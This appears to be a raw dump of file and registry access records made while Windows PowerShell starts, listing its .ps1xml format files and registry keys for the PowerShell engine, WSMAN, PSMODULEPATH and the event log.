ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
